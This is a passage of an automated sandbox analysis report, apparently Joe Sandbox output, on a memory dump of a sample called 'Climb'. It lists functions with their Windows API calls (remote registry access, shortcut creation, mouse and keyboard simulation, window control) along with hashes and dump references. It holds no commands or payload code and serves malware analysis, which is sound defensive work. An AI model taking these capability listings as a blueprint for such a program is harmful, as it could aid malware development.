Part of subcall function 00573C81: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,0056F669), ref: 00573C9D

_strlen.LIBCMT ref: 00572992

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
String ID:
API String ID: 3203458085-0
Opcode ID: a0f59a2950be2bec9a5d6e4f6043ebc9f0882700c4ad67c3c7cd31fc049ed982
Instruction ID: ebe5194bd8932a108086ee31954a4d51ba5cd85a7ccc49ced09fc5d77ace659c
Opcode Fuzzy Hash: a0f59a2950be2bec9a5d6e4f6043ebc9f0882700c4ad67c3c7cd31fc049ed982
Instruction Fuzzy Hash: 23B1ED31604301AFD324DF24D885E2ABBE5BF84318F54894CF55A4B2E2DB71ED86DB92

Function 00520527 Relevance: 9.3, APIs: 6, Instructions: 269COMMON

Download Yara Rule

APIs

__allrem.LIBCMT ref: 0052042A
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00520446
__allrem.LIBCMT ref: 0052045D
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0052047B
__allrem.LIBCMT ref: 00520492
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 005204B0

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
String ID:
API String ID: 1992179935-0
Opcode ID: f879b393e65d4db2631db90962c4ab5633f4520d067d5efed2ccc62c0ef88ee5
Instruction ID: ae02865f3e97a9920eb43b69beeab09ff511ae6ff2348a36a559eeffb3f91eff
Opcode Fuzzy Hash: f879b393e65d4db2631db90962c4ab5633f4520d067d5efed2ccc62c0ef88ee5
Instruction Fuzzy Hash: AA811E716017269BEB20EE68EC45B6FBBA4BF96320F14952AF511D76C3E770D9008790

Function 00526571 Relevance: 9.2, APIs: 6, Instructions: 216COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00518649,00518649,?,?,?,005267C2,00000001,00000001,8BE85006), ref: 005265CB
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,005267C2,00000001,00000001,8BE85006,?,?,?), ref: 00526651
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0052674B
__freea.LIBCMT ref: 00526758

Part of subcall function 00523B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00516A79,?,0000015D,?,?,?,?,005185B0,000000FF,00000000,?,?), ref: 00523BC5

__freea.LIBCMT ref: 00526761
__freea.LIBCMT ref: 00526786

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: 4e036777d273c6376904d65a35f64e4e0c6f5f0eb14d64151c6bb99fd39fff7f
Instruction ID: 1c476f2e0a975fbc48c0ba8303c3578b0378acd6070648a3e06ad5b78be9de23
Opcode Fuzzy Hash: 4e036777d273c6376904d65a35f64e4e0c6f5f0eb14d64151c6bb99fd39fff7f
Instruction Fuzzy Hash: 9F51D672600226AFDB254F64EC85EAB7FA9FF82754F184669FC05D61C0EB35DC50C6A0

Function 0057C63B Relevance: 9.2, APIs: 6, Instructions: 191registryCOMMON

Download Yara Rule

APIs

Part of subcall function 004FB329: _wcslen.LIBCMT ref: 004FB333

Part of subcall function 0057D3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0057C10E,?,?), ref: 0057D415
Part of subcall function 0057D3F8: _wcslen.LIBCMT ref: 0057D451
Part of subcall function 0057D3F8: _wcslen.LIBCMT ref: 0057D4C8
Part of subcall function 0057D3F8: _wcslen.LIBCMT ref: 0057D4FE

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0057C72A
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0057C785
RegCloseKey.ADVAPI32(00000000), ref: 0057C7CA
RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0057C7F9
RegCloseKey.ADVAPI32(?,?,00000000), ref: 0057C853
RegCloseKey.ADVAPI32(?), ref: 0057C85F

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
String ID:
API String ID: 1120388591-0
Opcode ID: 59c7fc0b1ce9a4d0bfd05a752168511711083bd3d1509682f6b6868abd08d578
Instruction ID: 35af83aaff2349bcd56172e706f12a06a6b6bd5759291086063c42ea11c9113b
Opcode Fuzzy Hash: 59c7fc0b1ce9a4d0bfd05a752168511711083bd3d1509682f6b6868abd08d578
Instruction Fuzzy Hash: 48819970208241AFC714DF24D885E2ABFE5FF84308F14889DF5598B2A2DB31ED46DB92

Function 0055009D Relevance: 9.2, APIs: 6, Instructions: 183memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(00000035), ref: 005500A9
SysAllocString.OLEAUT32(00000000), ref: 00550150
VariantCopy.OLEAUT32(00550354,00000000), ref: 00550179
VariantClear.OLEAUT32(00550354), ref: 0055019D
VariantCopy.OLEAUT32(00550354,00000000), ref: 005501A1
VariantClear.OLEAUT32(?), ref: 005501AB

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: Variant$ClearCopy$AllocInitString
String ID:
API String ID: 3859894641-0
Opcode ID: b94fdaa0fb0425de3ff4bd7142c110bbb85b6659427ab3169ae3210d44fcf0aa
Instruction ID: e6aca34c53229bd571fdb3c600f001e3a08e2ac675fbd6b155ccf937316039c1
Opcode Fuzzy Hash: b94fdaa0fb0425de3ff4bd7142c110bbb85b6659427ab3169ae3210d44fcf0aa
Instruction Fuzzy Hash: 77512A35500311A6DF10AB64D8ADB29BBA4FF45312F50A847EC05DF2D6DB709C88CB56

Function 00569B51 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 383COMMON

Download Yara Rule

APIs

Part of subcall function 004F41EA: _wcslen.LIBCMT ref: 004F41EF

Part of subcall function 004F8577: _wcslen.LIBCMT ref: 004F858A

GetOpenFileNameW.COMDLG32(00000058), ref: 00569F2A
_wcslen.LIBCMT ref: 00569F4B
_wcslen.LIBCMT ref: 00569F72
GetSaveFileNameW.COMDLG32(00000058), ref: 00569FCA

Strings

X, xrefs: 00569E57

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: _wcslen$FileName$OpenSave
String ID: X
API String ID: 83654149-3081909835
Opcode ID: 93fc6ece8be867d83e750125a33f397523e88a216d19658b28fcd431e0ef9524
Instruction ID: 7c05f4e8da61ef0af27c68a3034f6a4c81605efe002410d26118bd3538e1017d
Opcode Fuzzy Hash: 93fc6ece8be867d83e750125a33f397523e88a216d19658b28fcd431e0ef9524
Instruction Fuzzy Hash: 8EE1C1315043009FD724EF25C885A6ABBF4FF85314F04896DF9899B2A2DB35ED05CB92

Function 00566ED3 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 367comCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00566F21
CoInitialize.OLE32(00000000), ref: 0056707E
CoCreateInstance.OLE32(00590CC4,00000000,00000001,00590B34,?), ref: 00567095
CoUninitialize.OLE32 ref: 00567319

Strings

.lnk, xrefs: 00566EFF, 00566F69, 00567025

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize_wcslen
String ID: .lnk
API String ID: 886957087-24824748
Opcode ID: 95a6d5fc86a0f9403bd9814688a24d490ed54e0e6d443dd90528a33adb14b684
Instruction ID: 532b2a7c8370eadae87bf16c2ff4f09c4e52e8a5b570f6c60151f59f11adf059
Opcode Fuzzy Hash: 95a6d5fc86a0f9403bd9814688a24d490ed54e0e6d443dd90528a33adb14b684
Instruction Fuzzy Hash: 0DD15971508209AFD300EF25C881D6BBBE8FF98708F40495EF5959B2A2DB71ED45CB92

Function 00561196 Relevance: 9.1, APIs: 6, Instructions: 107fileCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 005611B3
ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 005611EE
EnterCriticalSection.KERNEL32(?), ref: 0056120A
LeaveCriticalSection.KERNEL32(?), ref: 00561283
ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 0056129A
InterlockedExchange.KERNEL32(?,000001F6), ref: 005612C8

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
String ID:
API String ID: 3368777196-0
Opcode ID: c8b06dae2ff3422c587c37a5c1da29a0b7f1ac28612486166f7252147ea8db25
Instruction ID: 6eb101c3cdf2bc4528b4ab55fcb8067e1ae443796d4481d3fc7536661c9b109a
Opcode Fuzzy Hash: c8b06dae2ff3422c587c37a5c1da29a0b7f1ac28612486166f7252147ea8db25
Instruction Fuzzy Hash: A8418175900205EFDF04EF54DC89AAABBB8FF44310F1440A5EE00AB296DB74DE95DBA4

Function 00588C36 Relevance: 9.1, APIs: 6, Instructions: 104windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,0054FBEF,00000000,?,?,00000000,?,005339E2,00000004,00000000,00000000), ref: 00588CA7
EnableWindow.USER32(?,00000000), ref: 00588CCD
ShowWindow.USER32(FFFFFFFF,00000000), ref: 00588D2C
ShowWindow.USER32(?,00000004), ref: 00588D40
EnableWindow.USER32(?,00000001), ref: 00588D66
SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 00588D8A

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: Window$Show$Enable$MessageSend
String ID:
API String ID: 642888154-0
Opcode ID: 608d4d6e215484e45390c023d3ce85293fcb822d45c01fd9671c9debf4cfb46b
Instruction ID: 38b25d250c6921b7b25d3bfc50ffd0511a3c195721c9068f29f8102b268f444a
Opcode Fuzzy Hash: 608d4d6e215484e45390c023d3ce85293fcb822d45c01fd9671c9debf4cfb46b
Instruction Fuzzy Hash: 5C417130602645AFDB25EF24C889FB57FF1FB55304F5441A9E908AF2A2CB716C4ADB60

Function 00572D37 Relevance: 9.1, APIs: 6, Instructions: 103COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,00000000), ref: 00572D45

Part of subcall function 0056EF33: GetWindowRect.USER32(?,?), ref: 0056EF4B

GetDesktopWindow.USER32 ref: 00572D6F
GetWindowRect.USER32(00000000), ref: 00572D76
mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00572DB2
GetCursorPos.USER32(?), ref: 00572DDE
mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00572E3C

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: Window$Rectmouse_event$CursorDesktopForeground
String ID:
API String ID: 2387181109-0
Opcode ID: b88c7ec59d70569b76101ef1d8555e19da0f7a78b89895dfc5dee68cf85f64e5
Instruction ID: 813fd449fb599f313986280705e8c34828703ada087e0a16440d6d586ea337df
Opcode Fuzzy Hash: b88c7ec59d70569b76101ef1d8555e19da0f7a78b89895dfc5dee68cf85f64e5
Instruction Fuzzy Hash: 0931CB72505316AFC720DF549849F9BBBE9FBC4314F00491AF889A7181DA30EA499BA2

Function 005555E1 Relevance: 9.1, APIs: 6, Instructions: 87windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 005555F9
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00555616
SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0055564E
_wcslen.LIBCMT ref: 0055566C
CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00555674
_wcsstr.LIBVCRUNTIME ref: 0055567E

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
String ID:
API String ID: 72514467-0
Opcode ID: 43b8ed29a6bbac308c751ee34895daa71948f9fd93a1db20b680d3a5b1f4a69f
Instruction ID: 1f177823b1bb4ec83c86af044cb6586d6d39bbbec12cae16a5bedea6dd717d08
Opcode Fuzzy Hash: 43b8ed29a6bbac308c751ee34895daa71948f9fd93a1db20b680d3a5b1f4a69f
Instruction Fuzzy Hash: 57213132204640BBEB155B29DC29EBB7FA8FF84721F10402AFC05DA091FBA0CC8496A0

Function 00566263 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 336comCOMMON

Download Yara Rule

APIs

Part of subcall function 004F5851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,004F55D1,?,?,00534B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 004F5871

_wcslen.LIBCMT ref: 005662C0
CoInitialize.OLE32(00000000), ref: 005663DA
CoCreateInstance.OLE32(00590CC4,00000000,00000001,00590B34,?), ref: 005663F3
CoUninitialize.OLE32 ref: 00566411

Strings

.lnk, xrefs: 005662BB, 00566306, 005663CA

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
String ID: .lnk
API String ID: 3172280962-24824748
Opcode ID: dfac0154d934d476d21d133115e38826a821644328fdbced17bfed432c349e7e
Instruction ID: 42289ed4acb4fc5b611e8293af97a8e0a62f947d2409f21a8830336b4fc28aa1
Opcode Fuzzy Hash: dfac0154d934d476d21d133115e38826a821644328fdbced17bfed432c349e7e
Instruction Fuzzy Hash: 35D15070A082059FCB14DF25C494A2ABBF6FF89714F10885DF98A9B361CB31EC45CB92

Function 005136F2 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,005136E9,00513355), ref: 00513700
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0051370E
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00513727
SetLastError.KERNEL32(00000000,?,005136E9,00513355), ref: 00513779

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 1b1756c39bfb6bf8f4af741b7bc92af9a10439ecb7ab955830dc28a657110f51
Instruction ID: 32e9c3693a2696b2845e49d6f804ed1819b0b7916c5ab7a3a1afde650f1b36c6
Opcode Fuzzy Hash: 1b1756c39bfb6bf8f4af741b7bc92af9a10439ecb7ab955830dc28a657110f51
Instruction Fuzzy Hash: 6901F5B65093122EB7643BB4BCAE9E62EA4FB65771B200339F410500E0FF116EC5A250

Function 005230E7 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,00000000,00514D53,00000000,?,?,005168E2,?,?,00000000), ref: 005230EB
_free.LIBCMT ref: 0052311E
_free.LIBCMT ref: 00523146
SetLastError.KERNEL32(00000000,?,00000000), ref: 00523153
SetLastError.KERNEL32(00000000,?,00000000), ref: 0052315F
_abort.LIBCMT ref: 00523165

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: 1bdbceee22f677a5baf6eb64a3e376936ad8ec0fd6724bb51184e577d3b6941a
Instruction ID: 889381eb979b13b88507b04127fec9a912e7844f881f5bbd71cebd854af35f0b
Opcode Fuzzy Hash: 1bdbceee22f677a5baf6eb64a3e376936ad8ec0fd6724bb51184e577d3b6941a
Instruction Fuzzy Hash: 14F0863554452136C3152729BC0AA5A1F79BFD3761F210524FD14A22D1EE288916D571

Function 00589480 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

Part of subcall function 004F1F2D: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 004F1F87
Part of subcall function 004F1F2D: SelectObject.GDI32(?,00000000), ref: 004F1F96
Part of subcall function 004F1F2D: BeginPath.GDI32(?), ref: 004F1FAD
Part of subcall function 004F1F2D: SelectObject.GDI32(?,00000000), ref: 004F1FD6

MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 005894AA
LineTo.GDI32(?,00000003,00000000), ref: 005894BE
MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 005894CC
LineTo.GDI32(?,00000000,00000003), ref: 005894DC
EndPath.GDI32(?), ref: 005894EC
StrokePath.GDI32(?), ref: 005894FC

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: Path$LineMoveObjectSelect$BeginCreateStroke
String ID:
API String ID: 43455801-0
Opcode ID: c2bc4424c124781998d1251d158966342fdd48b573a7400ee073fbe362414f33
Instruction ID: da3ba46d4affdc7b00c6cefa748aafe250de9d1b359ddd48d4335c92b1705f3e
Opcode Fuzzy Hash: c2bc4424c124781998d1251d158966342fdd48b573a7400ee073fbe362414f33
Instruction Fuzzy Hash: B611097200010DFFDF02AF90DC88EAA7FADEF18364F048011BE195A1A1D7719D59EBA0

Function 004F327E Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 004F32AF
MapVirtualKeyW.USER32(00000010,00000000), ref: 004F32B7
MapVirtualKeyW.USER32(000000A0,00000000), ref: 004F32C2
MapVirtualKeyW.USER32(000000A1,00000000), ref: 004F32CD
MapVirtualKeyW.USER32(00000011,00000000), ref: 004F32D5
MapVirtualKeyW.USER32(00000012,00000000), ref: 004F32DD

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: 0edcd7016de310b1b8c44322098fb66aca21e128c38df2bfc1f35e616fafa547
Instruction ID: 18478d9253e4f70ae57fbe52a7a4479fb47d7d31cef71d79d8f14b7a38917ed5
Opcode Fuzzy Hash: 0edcd7016de310b1b8c44322098fb66aca21e128c38df2bfc1f35e616fafa547
Instruction Fuzzy Hash: C30148B09017597DE3008F5A8C85A52FFA8FF19354F00411B915C4B941C7B5A864CBE5

Function 0055F437 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,00000000), ref: 0055F447
